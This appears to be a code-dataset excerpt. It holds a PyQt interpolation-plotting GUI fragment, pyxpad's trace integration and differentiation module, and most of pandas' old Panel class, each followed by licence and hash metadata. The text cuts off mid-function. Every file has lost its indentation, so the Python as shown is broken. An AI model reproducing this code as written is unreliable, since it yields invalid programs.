def btnVerGraficoClick():
btnCalcularClick()
eixoX = str(ui.txtX.text())
eixoX = map(float,eixoX.split())
eixoY = str(ui.txtY.text())
eixoY = map(float,eixoY.split())
precisao = int(ui.txtPrecisao.text())
if ui.cmbMetodo.currentIndex()==0:
funcao = z.minimosQuadrados(eixoX,eixoY,precisao)[2]
elif ui.cmbMetodo.currentIndex()==2:
funcao = z.lagrange(eixoX,eixoY,precisao,1)[2]
elif ui.cmbMetodo.currentIndex()==3:
funcao = z.newton(eixoX,eixoY,precisao,1)[2]
else:
ponto = float(ui.txtPonto.text())
resultado = z.splinesLineares(eixoX,eixoY,precisao,ponto)
indice = resultado[1]
funcao = resultado[0][indice]
#QMessageBox.information(None,u'Informação',u'Função ainda não disponível.',QMessageBox.Ok)
if ui.cmbMetodo.currentIndex()==1:
figure = plt.figure(1)
ax1 = figure.add_subplot(111)
ax1.axhline(linewidth=4,color="black")
ax1.axvline(linewidth=4,color="black")
plt.grid(True)
fx, = plt.plot(eixoX,eixoY, 'r',label='f(x)',color='k',linewidth=2.0)
#dx, = plt.plot(x,y2,'r', label='f\'(x)',color='k',linewidth=1.0)
plt.show()
else:
funcao = str(funcao)
x=np.linspace(min(eixoX),max(eixoX),100)
y2 = eval(funcao)
figure = plt.figure(1)
ax1 = figure.add_subplot(111)
ax1.axhline(linewidth=4,color="black")
ax1.axvline(linewidth=4,color="black")
plt.grid(True)
#plt.xlim(min(eixoX),max(eixoX))
#plt.ylim(min(eixoY),max(eixoY))
fx, = plt.plot(eixoX,eixoY, 'ro',label='f(x)',color='k',linewidth=2.0)
dx, = plt.plot(x,y2,'r', label='f\'(x)',color='k',linewidth=1.0)
plt.show()
#janela = Window(window,eixoX,eixoY,str(funcao))
#janela.setAttribute(QtCore.Qt.WA_DeleteOnClose,True)
#janela.exec_()
def sair():
quit()
def btnAleatorioClick():
tamanho = int(ui.txtQuantidade.text())+1
listaX = []
listaY=[]
for i in range(1,tamanho,1):
x = np.random.randint(0,30)
y = np.random.randint(0,50)
while x in listaX:
x = np.random.randint(0,30)
while y in listaY:
y = np.random.randint(0,30)
listaX.append(x)
listaY.append(y)
lX = str(listaX)
lY = str(listaY)
lX = lX.replace('[','')
lX = lX.replace(',',' ')
lX = lX.replace(']','')
lY = lY.replace('[','')
lY = lY.replace(',',' ')
lY = lY.replace(']','')
ui.txtX.setText(lX)
ui.txtY.setText(lY)
def salvar():
fileName = QFileDialog.getSaveFileName(None, "Salvar Como")
if (fileName!=''):
f = open(fileName,'w')
resultado = str(ui.txtX.text()) + '\n' + str(ui.txtY.text()) + '\n'
resultado = resultado + str(ui.txtResultado.toPlainText()) + '\n'
f.write(resultado)
f.close()
#INICIANDO APLICACAO
app = QApplication(sys.argv)
#CRIANDO JANELA PRINCIPAL
window = QMainWindow()
ui = Ui_interpolacaoPrincipal()
ui.setupUi(window)
#LIGANDO CLICK DO BOTAO A FUNCAO ACIMA
ui.btnCalcular.clicked.connect(btnCalcularClick)
ui.btnGrafico.clicked.connect(btnVerGraficoClick)
ui.btnAleatorios.clicked.connect(btnAleatorioClick)
#ui.actionSair.triggered.connect(sair)
ui.cmbMetodo.currentIndexChanged.connect(cmbMetodoChanged)
ui.actionSalvarComo.triggered.connect(salvar)
window.show()
sys.exit(app.exec_())
|
gpl-3.0
| 3,902,660,676,013,172,000
| 36.732075
| 99
| 0.563256
| false
| 3.112045
| false
| false
| false
|
bendudson/pyxpad
|
pyxpad/calculus.py
|
1
|
1993
|
"""
Calculus on XPadDataItem objects
"""
from .pyxpad_utils import XPadDataItem
from numpy import zeros, cumsum
def integrate(item):
"""
Integrate the given trace
Inputs
------
item - an XPadDataItem object (or equivalent)
Returns
-------
an XPadDataItem object
"""
if len(item.dim) != 1:
raise ValueError("Can only integrate 1D traces currently")
# Create a result
result = XPadDataItem()
if item.name != "":
result.name = "INTG( "+item.name+" )"
result.source = item.source
if item.label != "":
result.label = "INTG( "+item.label+" )"
if item.units != "":
result.units = item.units+"*"+item.dim[0].units
result.data = zeros(item.data.shape)
time = item.dim[0].data
result.data[1:] = cumsum(0.5*(time[1:]-time[0:-1])*(item.data[1:] + item.data[0:-1]))
result.dim = item.dim
result.order = item.order
result.time = item.time
return result
def differentiate(item):
"""
Differentiates the given trace
Inputs
------
item - an XPadDataItem object (or equivalent)
Returns
-------
an XPadDataItem object
"""
if len(item.dim) != 1:
raise ValueError("Can only differentiate 1D traces")
# Create a result
result = XPadDataItem()
if item.name != "":
result.name = "Diff(" + item.name + ")"
result.source = item.source
if item.label != "":
result.label = "Diff(" + item.label + ")"
if item.units != "":
result.units = item.units + item.dim[0].units + chr(0x207B) + chr(0x00B9)
result.dim = item.dim
result.order = item.order
result.time = item.time
time = item.dim[item.order].data
result.data = zeros(len(item.data))
for i in range(1, len(result.data)-1):
result.data[i] = (item.data[i+1]-item.data[i-1])/(time[i+1]-time[i-1])
result.data[-1] = result.data[-2]
result.data[0] = result.data[1]
return result
|
gpl-3.0
| -439,367,664,206,884,740
| 20.202128
| 89
| 0.583041
| false
| 3.34396
| false
| false
| false
|
GuessWhoSamFoo/pandas
|
pandas/core/panel.py
|
1
|
55911
|
"""
Contains data structures designed for manipulating panel (3-dimensional) data
"""
# pylint: disable=E1103,W0231,W0212,W0621
from __future__ import division
import warnings
import numpy as np
import pandas.compat as compat
from pandas.compat import OrderedDict, map, range, u, zip
from pandas.compat.numpy import function as nv
from pandas.util._decorators import Appender, Substitution, deprecate_kwarg
from pandas.util._validators import validate_axis_style_args
from pandas.core.dtypes.cast import (
cast_scalar_to_array, infer_dtype_from_scalar, maybe_cast_item)
from pandas.core.dtypes.common import (
is_integer, is_list_like, is_scalar, is_string_like)
from pandas.core.dtypes.missing import notna
import pandas.core.common as com
from pandas.core.frame import DataFrame
from pandas.core.generic import NDFrame, _shared_docs
from pandas.core.index import (
Index, MultiIndex, _get_objs_combined_axis, ensure_index)
import pandas.core.indexes.base as ibase
from pandas.core.indexing import maybe_droplevels
from pandas.core.internals import (
BlockManager, create_block_manager_from_arrays,
create_block_manager_from_blocks)
import pandas.core.ops as ops
from pandas.core.reshape.util import cartesian_product
from pandas.core.series import Series
from pandas.io.formats.printing import pprint_thing
_shared_doc_kwargs = dict(
axes='items, major_axis, minor_axis',
klass="Panel",
axes_single_arg="{0, 1, 2, 'items', 'major_axis', 'minor_axis'}",
optional_mapper='', optional_axis='', optional_labels='')
_shared_doc_kwargs['args_transpose'] = (
"three positional arguments: each one of\n{ax_single}".format(
ax_single=_shared_doc_kwargs['axes_single_arg']))
def _ensure_like_indices(time, panels):
"""
Makes sure that time and panels are conformable.
"""
n_time = len(time)
n_panel = len(panels)
u_panels = np.unique(panels) # this sorts!
u_time = np.unique(time)
if len(u_time) == n_time:
time = np.tile(u_time, len(u_panels))
if len(u_panels) == n_panel:
panels = np.repeat(u_panels, len(u_time))
return time, panels
def panel_index(time, panels, names=None):
"""
Returns a multi-index suitable for a panel-like DataFrame.
Parameters
----------
time : array-like
Time index, does not have to repeat
panels : array-like
Panel index, does not have to repeat
names : list, optional
List containing the names of the indices
Returns
-------
multi_index : MultiIndex
Time index is the first level, the panels are the second level.
Examples
--------
>>> years = range(1960,1963)
>>> panels = ['A', 'B', 'C']
>>> panel_idx = panel_index(years, panels)
>>> panel_idx
MultiIndex([(1960, 'A'), (1961, 'A'), (1962, 'A'), (1960, 'B'),
(1961, 'B'), (1962, 'B'), (1960, 'C'), (1961, 'C'),
(1962, 'C')], dtype=object)
or
>>> years = np.repeat(range(1960,1963), 3)
>>> panels = np.tile(['A', 'B', 'C'], 3)
>>> panel_idx = panel_index(years, panels)
>>> panel_idx
MultiIndex([(1960, 'A'), (1960, 'B'), (1960, 'C'), (1961, 'A'),
(1961, 'B'), (1961, 'C'), (1962, 'A'), (1962, 'B'),
(1962, 'C')], dtype=object)
"""
if names is None:
names = ['time', 'panel']
time, panels = _ensure_like_indices(time, panels)
return MultiIndex.from_arrays([time, panels], sortorder=None, names=names)
class Panel(NDFrame):
"""
Represents wide format panel data, stored as 3-dimensional array.
.. deprecated:: 0.20.0
The recommended way to represent 3-D data are with a MultiIndex on a
DataFrame via the :attr:`~Panel.to_frame()` method or with the
`xarray package <http://xarray.pydata.org/en/stable/>`__.
Pandas provides a :attr:`~Panel.to_xarray()` method to automate this
conversion.
Parameters
----------
data : ndarray (items x major x minor), or dict of DataFrames
items : Index or array-like
axis=0
major_axis : Index or array-like
axis=1
minor_axis : Index or array-like
axis=2
copy : boolean, default False
Copy data from inputs. Only affects DataFrame / 2d ndarray input
dtype : dtype, default None
Data type to force, otherwise infer
"""
@property
def _constructor(self):
return type(self)
_constructor_sliced = DataFrame
def __init__(self, data=None, items=None, major_axis=None, minor_axis=None,
copy=False, dtype=None):
# deprecation GH13563
warnings.warn("\nPanel is deprecated and will be removed in a "
"future version.\nThe recommended way to represent "
"these types of 3-dimensional data are with a "
"MultiIndex on a DataFrame, via the "
"Panel.to_frame() method\n"
"Alternatively, you can use the xarray package "
"http://xarray.pydata.org/en/stable/.\n"
"Pandas provides a `.to_xarray()` method to help "
"automate this conversion.\n",
FutureWarning, stacklevel=3)
self._init_data(data=data, items=items, major_axis=major_axis,
minor_axis=minor_axis, copy=copy, dtype=dtype)
def _init_data(self, data, copy, dtype, **kwargs):
"""
Generate ND initialization; axes are passed
as required objects to __init__.
"""
if data is None:
data = {}
if dtype is not None:
dtype = self._validate_dtype(dtype)
passed_axes = [kwargs.pop(a, None) for a in self._AXIS_ORDERS]
if kwargs:
raise TypeError('_init_data() got an unexpected keyword '
'argument "{0}"'.format(list(kwargs.keys())[0]))
axes = None
if isinstance(data, BlockManager):
if com._any_not_none(*passed_axes):
axes = [x if x is not None else y
for x, y in zip(passed_axes, data.axes)]
mgr = data
elif isinstance(data, dict):
mgr = self._init_dict(data, passed_axes, dtype=dtype)
copy = False
dtype = None
elif isinstance(data, (np.ndarray, list)):
mgr = self._init_matrix(data, passed_axes, dtype=dtype, copy=copy)
copy = False
dtype = None
elif is_scalar(data) and com._all_not_none(*passed_axes):
values = cast_scalar_to_array([len(x) for x in passed_axes],
data, dtype=dtype)
mgr = self._init_matrix(values, passed_axes, dtype=values.dtype,
copy=False)
copy = False
else: # pragma: no cover
raise ValueError('Panel constructor not properly called!')
NDFrame.__init__(self, mgr, axes=axes, copy=copy, dtype=dtype)
def _init_dict(self, data, axes, dtype=None):
haxis = axes.pop(self._info_axis_number)
# prefilter if haxis passed
if haxis is not None:
haxis = ensure_index(haxis)
data = OrderedDict((k, v)
for k, v in compat.iteritems(data)
if k in haxis)
else:
keys = com.dict_keys_to_ordered_list(data)
haxis = Index(keys)
for k, v in compat.iteritems(data):
if isinstance(v, dict):
data[k] = self._constructor_sliced(v)
# extract axis for remaining axes & create the slicemap
raxes = [self._extract_axis(self, data, axis=i) if a is None else a
for i, a in enumerate(axes)]
raxes_sm = self._extract_axes_for_slice(self, raxes)
# shallow copy
arrays = []
haxis_shape = [len(a) for a in raxes]
for h in haxis:
v = values = data.get(h)
if v is None:
values = np.empty(haxis_shape, dtype=dtype)
values.fill(np.nan)
elif isinstance(v, self._constructor_sliced):
d = raxes_sm.copy()
d['copy'] = False
v = v.reindex(**d)
if dtype is not None:
v = v.astype(dtype)
values = v.values
arrays.append(values)
return self._init_arrays(arrays, haxis, [haxis] + raxes)
def _init_arrays(self, arrays, arr_names, axes):
return create_block_manager_from_arrays(arrays, arr_names, axes)
@classmethod
def from_dict(cls, data, intersect=False, orient='items', dtype=None):
"""
Construct Panel from dict of DataFrame objects.
Parameters
----------
data : dict
{field : DataFrame}
intersect : boolean
Intersect indexes of input DataFrames
orient : {'items', 'minor'}, default 'items'
The "orientation" of the data. If the keys of the passed dict
should be the items of the result panel, pass 'items'
(default). Otherwise if the columns of the values of the passed
DataFrame objects should be the items (which in the case of
mixed-dtype data you should do), instead pass 'minor'
dtype : dtype, default None
Data type to force, otherwise infer
Returns
-------
Panel
"""
from collections import defaultdict
orient = orient.lower()
if orient == 'minor':
new_data = defaultdict(OrderedDict)
for col, df in compat.iteritems(data):
for item, s in compat.iteritems(df):
new_data[item][col] = s
data = new_data
elif orient != 'items': # pragma: no cover
raise ValueError('Orientation must be one of {items, minor}.')
d = cls._homogenize_dict(cls, data, intersect=intersect, dtype=dtype)
ks = list(d['data'].keys())
if not isinstance(d['data'], OrderedDict):
ks = list(sorted(ks))
d[cls._info_axis_name] = Index(ks)
return cls(**d)
def __getitem__(self, key):
key = com.apply_if_callable(key, self)
if isinstance(self._info_axis, MultiIndex):
return self._getitem_multilevel(key)
if not (is_list_like(key) or isinstance(key, slice)):
return super(Panel, self).__getitem__(key)
return self.loc[key]
def _getitem_multilevel(self, key):
info = self._info_axis
loc = info.get_loc(key)
if isinstance(loc, (slice, np.ndarray)):
new_index = info[loc]
result_index = maybe_droplevels(new_index, key)
slices = [loc] + [slice(None)] * (self._AXIS_LEN - 1)
new_values = self.values[slices]
d = self._construct_axes_dict(self._AXIS_ORDERS[1:])
d[self._info_axis_name] = result_index
result = self._constructor(new_values, **d)
return result
else:
return self._get_item_cache(key)
def _init_matrix(self, data, axes, dtype=None, copy=False):
values = self._prep_ndarray(self, data, copy=copy)
if dtype is not None:
try:
values = values.astype(dtype)
except Exception:
raise ValueError('failed to cast to '
'{datatype}'.format(datatype=dtype))
shape = values.shape
fixed_axes = []
for i, ax in enumerate(axes):
if ax is None:
ax = ibase.default_index(shape[i])
else:
ax = ensure_index(ax)
fixed_axes.append(ax)
return create_block_manager_from_blocks([values], fixed_axes)
# ----------------------------------------------------------------------
# Comparison methods
def _compare_constructor(self, other, func):
if not self._indexed_same(other):
raise Exception('Can only compare identically-labeled '
'same type objects')
new_data = {col: func(self[col], other[col])
for col in self._info_axis}
d = self._construct_axes_dict(copy=False)
return self._constructor(data=new_data, **d)
# ----------------------------------------------------------------------
# Magic methods
def __unicode__(self):
"""
Return a string representation for a particular Panel.
Invoked by unicode(df) in py2 only.
Yields a Unicode String in both py2/py3.
"""
class_name = str(self.__class__)
dims = u('Dimensions: {dimensions}'.format(dimensions=' x '.join(
["{shape} ({axis})".format(shape=shape, axis=axis) for axis, shape
in zip(self._AXIS_ORDERS, self.shape)])))
def axis_pretty(a):
v = getattr(self, a)
if len(v) > 0:
return u('{ax} axis: {x} to {y}'.format(ax=a.capitalize(),
x=pprint_thing(v[0]),
y=pprint_thing(v[-1])))
else:
return u('{ax} axis: None'.format(ax=a.capitalize()))
output = '\n'.join(
[class_name, dims] + [axis_pretty(a) for a in self._AXIS_ORDERS])
return output
def _get_plane_axes_index(self, axis):
"""
Get my plane axes indexes: these are already
(as compared with higher level planes),
as we are returning a DataFrame axes indexes.
"""
axis_name = self._get_axis_name(axis)
if axis_name == 'major_axis':
index = 'minor_axis'
columns = 'items'
if axis_name == 'minor_axis':
index = 'major_axis'
columns = 'items'
elif axis_name == 'items':
index = 'major_axis'
columns = 'minor_axis'
return index, columns
def _get_plane_axes(self, axis):
"""
Get my plane axes indexes: these are already
(as compared with higher level planes),
as we are returning a DataFrame axes.
"""
return [self._get_axis(axi)
for axi in self._get_plane_axes_index(axis)]
fromDict = from_dict
def to_sparse(self, *args, **kwargs):
"""
NOT IMPLEMENTED: do not call this method, as sparsifying is not
supported for Panel objects and will raise an error.
Convert to SparsePanel.
"""
raise NotImplementedError("sparsifying is not supported "
"for Panel objects")
def to_excel(self, path, na_rep='', engine=None, **kwargs):
"""
Write each DataFrame in Panel to a separate excel sheet.
Parameters
----------
path : string or ExcelWriter object
File path or existing ExcelWriter
na_rep : string, default ''
Missing data representation
engine : string, default None
write engine to use - you can also set this via the options
``io.excel.xlsx.writer``, ``io.excel.xls.writer``, and
``io.excel.xlsm.writer``.
Other Parameters
----------------
float_format : string, default None
Format string for floating point numbers
cols : sequence, optional
Columns to write
header : boolean or list of string, default True
Write out column names. If a list of string is given it is
assumed to be aliases for the column names
index : boolean, default True
Write row names (index)
index_label : string or sequence, default None
Column label for index column(s) if desired. If None is given, and
`header` and `index` are True, then the index names are used. A
sequence should be given if the DataFrame uses MultiIndex.
startrow : upper left cell row to dump data frame
startcol : upper left cell column to dump data frame
Notes
-----
Keyword arguments (and na_rep) are passed to the ``to_excel`` method
for each DataFrame written.
"""
from pandas.io.excel import ExcelWriter
if isinstance(path, compat.string_types):
writer = ExcelWriter(path, engine=engine)
else:
writer = path
kwargs['na_rep'] = na_rep
for item, df in self.iteritems():
name = str(item)
df.to_excel(writer, name, **kwargs)
writer.save()
def as_matrix(self):
self._consolidate_inplace()
return self._data.as_array()
# ----------------------------------------------------------------------
# Getting and setting elements
def get_value(self, *args, **kwargs):
"""
Quickly retrieve single value at (item, major, minor) location.
.. deprecated:: 0.21.0
Please use .at[] or .iat[] accessors.
Parameters
----------
item : item label (panel item)
major : major axis label (panel item row)
minor : minor axis label (panel item column)
takeable : interpret the passed labels as indexers, default False
Returns
-------
value : scalar value
"""
warnings.warn("get_value is deprecated and will be removed "
"in a future release. Please use "
".at[] or .iat[] accessors instead", FutureWarning,
stacklevel=2)
return self._get_value(*args, **kwargs)
def _get_value(self, *args, **kwargs):
nargs = len(args)
nreq = self._AXIS_LEN
# require an arg for each axis
if nargs != nreq:
raise TypeError('There must be an argument for each axis, you gave'
' {0} args, but {1} are required'.format(nargs,
nreq))
takeable = kwargs.pop('takeable', None)
if kwargs:
raise TypeError('get_value() got an unexpected keyword '
'argument "{0}"'.format(list(kwargs.keys())[0]))
if takeable is True:
lower = self._iget_item_cache(args[0])
else:
lower = self._get_item_cache(args[0])
return lower._get_value(*args[1:], takeable=takeable)
_get_value.__doc__ = get_value.__doc__
def set_value(self, *args, **kwargs):
"""
Quickly set single value at (item, major, minor) location.
.. deprecated:: 0.21.0
Please use .at[] or .iat[] accessors.
Parameters
----------
item : item label (panel item)
major : major axis label (panel item row)
minor : minor axis label (panel item column)
value : scalar
takeable : interpret the passed labels as indexers, default False
Returns
-------
panel : Panel
If label combo is contained, will be reference to calling Panel,
otherwise a new object
"""
warnings.warn("set_value is deprecated and will be removed "
"in a future release. Please use "
".at[] or .iat[] accessors instead", FutureWarning,
stacklevel=2)
return self._set_value(*args, **kwargs)
def _set_value(self, *args, **kwargs):
# require an arg for each axis and the value
nargs = len(args)
nreq = self._AXIS_LEN + 1
if nargs != nreq:
raise TypeError('There must be an argument for each axis plus the '
'value provided, you gave {0} args, but {1} are '
'required'.format(nargs, nreq))
takeable = kwargs.pop('takeable', None)
if kwargs:
raise TypeError('set_value() got an unexpected keyword '
'argument "{0}"'.format(list(kwargs.keys())[0]))
try:
if takeable is True:
lower = self._iget_item_cache(args[0])
else:
lower = self._get_item_cache(args[0])
lower._set_value(*args[1:], takeable=takeable)
return self
except KeyError:
axes = self._expand_axes(args)
d = self._construct_axes_dict_from(self, axes, copy=False)
result = self.reindex(**d)
args = list(args)
likely_dtype, args[-1] = infer_dtype_from_scalar(args[-1])
made_bigger = not np.array_equal(axes[0], self._info_axis)
# how to make this logic simpler?
if made_bigger:
maybe_cast_item(result, args[0], likely_dtype)
return result._set_value(*args)
_set_value.__doc__ = set_value.__doc__
def _box_item_values(self, key, values):
if self.ndim == values.ndim:
result = self._constructor(values)
# a dup selection will yield a full ndim
if result._get_axis(0).is_unique:
result = result[key]
return result
d = self._construct_axes_dict_for_slice(self._AXIS_ORDERS[1:])
return self._constructor_sliced(values, **d)
def __setitem__(self, key, value):
key = com.apply_if_callable(key, self)
shape = tuple(self.shape)
if isinstance(value, self._constructor_sliced):
value = value.reindex(
**self._construct_axes_dict_for_slice(self._AXIS_ORDERS[1:]))
mat = value.values
elif isinstance(value, np.ndarray):
if value.shape != shape[1:]:
raise ValueError('shape of value must be {0}, shape of given '
'object was {1}'.format(
shape[1:], tuple(map(int, value.shape))))
mat = np.asarray(value)
elif is_scalar(value):
mat = cast_scalar_to_array(shape[1:], value)
else:
raise TypeError('Cannot set item of '
'type: {dtype!s}'.format(dtype=type(value)))
mat = mat.reshape(tuple([1]) + shape[1:])
NDFrame._set_item(self, key, mat)
def _unpickle_panel_compat(self, state): # pragma: no cover
"""
Unpickle the panel.
"""
from pandas.io.pickle import _unpickle_array
_unpickle = _unpickle_array
vals, items, major, minor = state
items = _unpickle(items)
major = _unpickle(major)
minor = _unpickle(minor)
values = _unpickle(vals)
wp = Panel(values, items, major, minor)
self._data = wp._data
def conform(self, frame, axis='items'):
"""
Conform input DataFrame to align with chosen axis pair.
Parameters
----------
frame : DataFrame
axis : {'items', 'major', 'minor'}
Axis the input corresponds to. E.g., if axis='major', then
the frame's columns would be items, and the index would be
values of the minor axis
Returns
-------
DataFrame
"""
axes = self._get_plane_axes(axis)
return frame.reindex(**self._extract_axes_for_slice(self, axes))
def head(self, n=5):
raise NotImplementedError
def tail(self, n=5):
raise NotImplementedError
def round(self, decimals=0, *args, **kwargs):
"""
Round each value in Panel to a specified number of decimal places.
.. versionadded:: 0.18.0
Parameters
----------
decimals : int
Number of decimal places to round to (default: 0).
If decimals is negative, it specifies the number of
positions to the left of the decimal point.
Returns
-------
Panel object
See Also
--------
numpy.around
"""
nv.validate_round(args, kwargs)
if is_integer(decimals):
result = np.apply_along_axis(np.round, 0, self.values)
return self._wrap_result(result, axis=0)
raise TypeError("decimals must be an integer")
def _needs_reindex_multi(self, axes, method, level):
"""
Don't allow a multi reindex on Panel or above ndim.
"""
return False
def align(self, other, **kwargs):
raise NotImplementedError
def dropna(self, axis=0, how='any', inplace=False):
"""
Drop 2D from panel, holding passed axis constant.
Parameters
----------
axis : int, default 0
Axis to hold constant. E.g. axis=1 will drop major_axis entries
having a certain amount of NA data
how : {'all', 'any'}, default 'any'
'any': one or more values are NA in the DataFrame along the
axis. For 'all' they all must be.
inplace : bool, default False
If True, do operation inplace and return None.
Returns
-------
dropped : Panel
"""
axis = self._get_axis_number(axis)
values = self.values
mask = notna(values)
for ax in reversed(sorted(set(range(self._AXIS_LEN)) - {axis})):
mask = mask.sum(ax)
per_slice = np.prod(values.shape[:axis] + values.shape[axis + 1:])
if how == 'all':
cond = mask > 0
else:
cond = mask == per_slice
new_ax = self._get_axis(axis)[cond]
result = self.reindex_axis(new_ax, axis=axis)
if inplace:
self._update_inplace(result)
else:
return result
def _combine(self, other, func, axis=0):
if isinstance(other, Panel):
return self._combine_panel(other, func)
elif isinstance(other, DataFrame):
return self._combine_frame(other, func, axis=axis)
elif is_scalar(other):
return self._combine_const(other, func)
else:
raise NotImplementedError(
"{otype!s} is not supported in combine operation with "
"{selftype!s}".format(otype=type(other), selftype=type(self)))
def _combine_const(self, other, func):
with np.errstate(all='ignore'):
new_values = func(self.values, other)
d = self._construct_axes_dict()
return self._constructor(new_values, **d)
def _combine_frame(self, other, func, axis=0):
index, columns = self._get_plane_axes(axis)
axis = self._get_axis_number(axis)
other = other.reindex(index=index, columns=columns)
with np.errstate(all='ignore'):
if axis == 0:
new_values = func(self.values, other.values)
elif axis == 1:
new_values = func(self.values.swapaxes(0, 1), other.values.T)
new_values = new_values.swapaxes(0, 1)
elif axis == 2:
new_values = func(self.values.swapaxes(0, 2), other.values)
new_values = new_values.swapaxes(0, 2)
return self._constructor(new_values, self.items, self.major_axis,
self.minor_axis)
def _combine_panel(self, other, func):
items = self.items.union(other.items)
major = self.major_axis.union(other.major_axis)
minor = self.minor_axis.union(other.minor_axis)
# could check that everything's the same size, but forget it
this = self.reindex(items=items, major=major, minor=minor)
other = other.reindex(items=items, major=major, minor=minor)
with np.errstate(all='ignore'):
result_values = func(this.values, other.values)
return self._constructor(result_values, items, major, minor)
def major_xs(self, key):
"""
Return slice of panel along major axis.
Parameters
----------
key : object
Major axis label
Returns
-------
y : DataFrame
index -> minor axis, columns -> items
Notes
-----
major_xs is only for getting, not setting values.
MultiIndex Slicers is a generic way to get/set values on any level or
levels and is a superset of major_xs functionality, see
:ref:`MultiIndex Slicers <advanced.mi_slicers>`
"""
return self.xs(key, axis=self._AXIS_LEN - 2)
def minor_xs(self, key):
"""
Return slice of panel along minor axis.
Parameters
----------
key : object
Minor axis label
Returns
-------
y : DataFrame
index -> major axis, columns -> items
Notes
-----
minor_xs is only for getting, not setting values.
MultiIndex Slicers is a generic way to get/set values on any level or
levels and is a superset of minor_xs functionality, see
:ref:`MultiIndex Slicers <advanced.mi_slicers>`
"""
return self.xs(key, axis=self._AXIS_LEN - 1)
def xs(self, key, axis=1):
"""
Return slice of panel along selected axis.
Parameters
----------
key : object
Label
axis : {'items', 'major', 'minor}, default 1/'major'
Returns
-------
y : ndim(self)-1
Notes
-----
xs is only for getting, not setting values.
MultiIndex Slicers is a generic way to get/set values on any level or
levels and is a superset of xs functionality, see
:ref:`MultiIndex Slicers <advanced.mi_slicers>`
"""
axis = self._get_axis_number(axis)
if axis == 0:
return self[key]
self._consolidate_inplace()
axis_number = self._get_axis_number(axis)
new_data = self._data.xs(key, axis=axis_number, copy=False)
result = self._construct_return_type(new_data)
copy = new_data.is_mixed_type
result._set_is_copy(self, copy=copy)
return result
_xs = xs
def _ixs(self, i, axis=0):
"""
Parameters
----------
i : int, slice, or sequence of integers
axis : int
"""
ax = self._get_axis(axis)
key = ax[i]
# xs cannot handle a non-scalar key, so just reindex here
# if we have a multi-index and a single tuple, then its a reduction
# (GH 7516)
if not (isinstance(ax, MultiIndex) and isinstance(key, tuple)):
if is_list_like(key):
indexer = {self._get_axis_name(axis): key}
return self.reindex(**indexer)
# a reduction
if axis == 0:
values = self._data.iget(i)
return self._box_item_values(key, values)
# xs by position
self._consolidate_inplace()
new_data = self._data.xs(i, axis=axis, copy=True, takeable=True)
return self._construct_return_type(new_data)
def groupby(self, function, axis='major'):
"""
Group data on given axis, returning GroupBy object.
Parameters
----------
function : callable
Mapping function for chosen access
axis : {'major', 'minor', 'items'}, default 'major'
Returns
-------
grouped : PanelGroupBy
"""
from pandas.core.groupby import PanelGroupBy
axis = self._get_axis_number(axis)
return PanelGroupBy(self, function, axis=axis)
def to_frame(self, filter_observations=True):
"""
Transform wide format into long (stacked) format as DataFrame whose
columns are the Panel's items and whose index is a MultiIndex formed
of the Panel's major and minor axes.
Parameters
----------
filter_observations : boolean, default True
Drop (major, minor) pairs without a complete set of observations
across all the items
Returns
-------
y : DataFrame
"""
_, N, K = self.shape
if filter_observations:
# shaped like the return DataFrame
mask = notna(self.values).all(axis=0)
# size = mask.sum()
selector = mask.ravel()
else:
# size = N * K
selector = slice(None, None)
data = {item: self[item].values.ravel()[selector]
for item in self.items}
def construct_multi_parts(idx, n_repeat, n_shuffle=1):
# Replicates and shuffles MultiIndex, returns individual attributes
codes = [np.repeat(x, n_repeat) for x in idx.codes]
# Assumes that each label is divisible by n_shuffle
codes = [x.reshape(n_shuffle, -1).ravel(order='F')
for x in codes]
codes = [x[selector] for x in codes]
levels = idx.levels
names = idx.names
return codes, levels, names
def construct_index_parts(idx, major=True):
levels = [idx]
if major:
codes = [np.arange(N).repeat(K)[selector]]
names = idx.name or 'major'
else:
codes = np.arange(K).reshape(1, K)[np.zeros(N, dtype=int)]
codes = [codes.ravel()[selector]]
names = idx.name or 'minor'
names = [names]
return codes, levels, names
if isinstance(self.major_axis, MultiIndex):
major_codes, major_levels, major_names = construct_multi_parts(
self.major_axis, n_repeat=K)
else:
major_codes, major_levels, major_names = construct_index_parts(
self.major_axis)
if isinstance(self.minor_axis, MultiIndex):
minor_codes, minor_levels, minor_names = construct_multi_parts(
self.minor_axis, n_repeat=N, n_shuffle=K)
else:
minor_codes, minor_levels, minor_names = construct_index_parts(
self.minor_axis, major=False)
levels = major_levels + minor_levels
codes = major_codes + minor_codes
names = major_names + minor_names
index = MultiIndex(levels=levels, codes=codes, names=names,
verify_integrity=False)
return DataFrame(data, index=index, columns=self.items)
def apply(self, func, axis='major', **kwargs):
"""
Applies function along axis (or axes) of the Panel.
Parameters
----------
func : function
Function to apply to each combination of 'other' axes
e.g. if axis = 'items', the combination of major_axis/minor_axis
will each be passed as a Series; if axis = ('items', 'major'),
DataFrames of items & major axis will be passed
axis : {'items', 'minor', 'major'}, or {0, 1, 2}, or a tuple with two
axes
Additional keyword arguments will be passed as keywords to the function
Returns
-------
result : Panel, DataFrame, or Series
Examples
--------
Returns a Panel with the square root of each element
>>> p = pd.Panel(np.random.rand(4, 3, 2)) # doctest: +SKIP
>>> p.apply(np.sqrt)
Equivalent to p.sum(1), returning a DataFrame
>>> p.apply(lambda x: x.sum(), axis=1) # doctest: +SKIP
Equivalent to previous:
>>> p.apply(lambda x: x.sum(), axis='major') # doctest: +SKIP
Return the shapes of each DataFrame over axis 2 (i.e the shapes of
items x major), as a Series
>>> p.apply(lambda x: x.shape, axis=(0,1)) # doctest: +SKIP
"""
if kwargs and not isinstance(func, np.ufunc):
f = lambda x: func(x, **kwargs)
else:
f = func
# 2d-slabs
if isinstance(axis, (tuple, list)) and len(axis) == 2:
return self._apply_2d(f, axis=axis)
axis = self._get_axis_number(axis)
# try ufunc like
if isinstance(f, np.ufunc):
try:
with np.errstate(all='ignore'):
result = np.apply_along_axis(func, axis, self.values)
return self._wrap_result(result, axis=axis)
except (AttributeError):
pass
# 1d
return self._apply_1d(f, axis=axis)
def _apply_1d(self, func, axis):
axis_name = self._get_axis_name(axis)
ndim = self.ndim
values = self.values
# iter thru the axes
slice_axis = self._get_axis(axis)
slice_indexer = [0] * (ndim - 1)
indexer = np.zeros(ndim, 'O')
indlist = list(range(ndim))
indlist.remove(axis)
indexer[axis] = slice(None, None)
indexer.put(indlist, slice_indexer)
planes = [self._get_axis(axi) for axi in indlist]
shape = np.array(self.shape).take(indlist)
# all the iteration points
points = cartesian_product(planes)
results = []
for i in range(np.prod(shape)):
# construct the object
pts = tuple(p[i] for p in points)
indexer.put(indlist, slice_indexer)
